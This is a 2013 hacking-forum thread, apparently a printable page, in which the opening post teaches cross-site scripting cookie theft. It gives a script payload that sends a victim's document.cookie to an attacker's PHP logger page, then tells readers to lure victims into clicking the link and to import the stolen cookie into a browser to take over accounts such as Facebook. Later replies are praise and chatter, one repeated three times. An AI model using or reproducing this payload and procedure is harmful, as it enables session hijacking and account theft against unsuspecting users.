Sinisterly
Advanced XSS Tutorial [PART 2] - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Advanced XSS Tutorial [PART 2] (/Thread-Advanced-XSS-Tutorial-PART-2)

Pages: 1 2


Advanced XSS Tutorial [PART 2] - RaccoonCity_mybb_import13707 - 09-28-2013

ADVANCED XSS PART 2

Here comes the real stuff. Now you're going to exploit the vulnerability with the PHP script, if you have found a persistant XSS this will be a piece of cake, if not (which is probablly is) you'll have to send the link to everyone you want to get the cookies from.

1. Now, go to your vulnerable site and enter the following where it's vulnerable:

Code:
<script>location.href = 'http://www.Yoursite.3owl.com/Stealer.php?cookie='+document.cookie;</script>

2. Send the link to the one you want the cookies from (Usually if you find a vulnerability in a big service, for example Google or Youtube, everyone will click the link because everyone trusts Youtube and Google, right?), now when they have clicked the link you can head back to your "log.txt" and you'll see the victims IP, Port Number, Host, User Agent and ofcourse, their cookie.

Now, when we have the cookie, what are we supposed to do with it?
- Well, i'll show you!


Download the "Cookies Manager" addon for your browser and you can edit your cookies with the excisting cookies. If you would find this on facebook for example, edit the cookies and refresh the page and BAM, you're logged in into your victims Facebook account.



RE: Advanced XSS Tutorial [PART 2] - The Real Slim Shady - 09-28-2013

looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.


RE: Advanced XSS Tutorial [PART 2] - RaccoonCity_mybb_import13707 - 09-28-2013

(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.


RE: Advanced XSS Tutorial [PART 2] - The Real Slim Shady - 09-28-2013

(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol


RE: Advanced XSS Tutorial [PART 2] - RaccoonCity_mybb_import13707 - 09-28-2013

(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

Haha! No problem :Smile:


RE: Advanced XSS Tutorial [PART 2] - EgyptGhost - 09-28-2013

keep it up pro Smile


RE: Advanced XSS Tutorial [PART 2] - RaccoonCity_mybb_import13707 - 09-28-2013

(09-28-2013, 03:27 PM)EgyptGhost Wrote: keep it up pro Smile

Thanks! :Smile:


RE: Advanced XSS Tutorial [PART 2] - Nailo - 10-24-2013

(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile


RE: Advanced XSS Tutorial [PART 2] - Nailo - 10-24-2013

(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile


RE: Advanced XSS Tutorial [PART 2] - Nailo - 10-24-2013

(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile